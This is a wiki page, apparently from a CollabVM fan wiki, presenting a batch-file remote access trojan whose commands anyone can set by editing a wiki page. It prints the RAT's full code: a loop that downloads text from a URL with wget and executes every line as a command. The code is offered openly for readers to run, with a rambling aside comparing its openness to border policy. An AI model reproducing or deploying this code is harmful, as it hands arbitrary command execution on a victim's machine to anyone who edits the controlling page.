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CollabVM Wikia/The Free RAT Which Anyone Can Command: Difference between revisions

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Latest revision as of 23:56, 19 December 2024

This RAT was much more recently created than other well-known ones, out of Debianguy's wild experimentation with the code of Keurig's failed attempt at a batch file RAT. While Keurig had given up on that batch RAT attempt and gone off to other work on graphical Java applets, Debianguy heavily fixed it to be complete and working. Then he took a second glance at the way it's implemented, by just parsing whatever text is stored at an arbitrary URL (at that point, and got sparked into letting his imagination run wild. Maybe it all remained wild while he wrote the article about this RAT.

Submitting commands

Any text which is valid as a line of a batch file can be submitted to it as a command, which takes no more to submit than an edit to The Free RAT Which Anyone Can Command/Latest command with the entire content of the page replaced by the given command. In fact, this box below shows the latest command submitted to the aforementioned RAT:

[[:The Free RAT Which Anyone Can Command/Latest command]]

However, it's not recommended to go ahead and just run the RAT right now. You better remember beforehand that there are dangers posed by such a RAT as opened up for control as this one, similar to those posed by an open border policy. Though the creator of this RAT won't last at holding anything against Angela Merkel or expecting less good than harm to be done through the power of this RAT, it's fine for you to distrust Debianguy's far too liberal decisions on policies and follow what you know to be necessary to restrict control of CollabVM from the hands of its foreign enemies. If you understand and accept that, then you're fit to have the complete code:

Full code of the batch file

@echo off
echo. > lastcommand.txt
wget -O command.txt ""
fc lastcommand.txt command.txt && goto skipcommand
for /F "usebackq delims=" %%l in (`type command.txt`) do @%%l
copy command.txt lastcommand.txt
timeout /t 5
goto check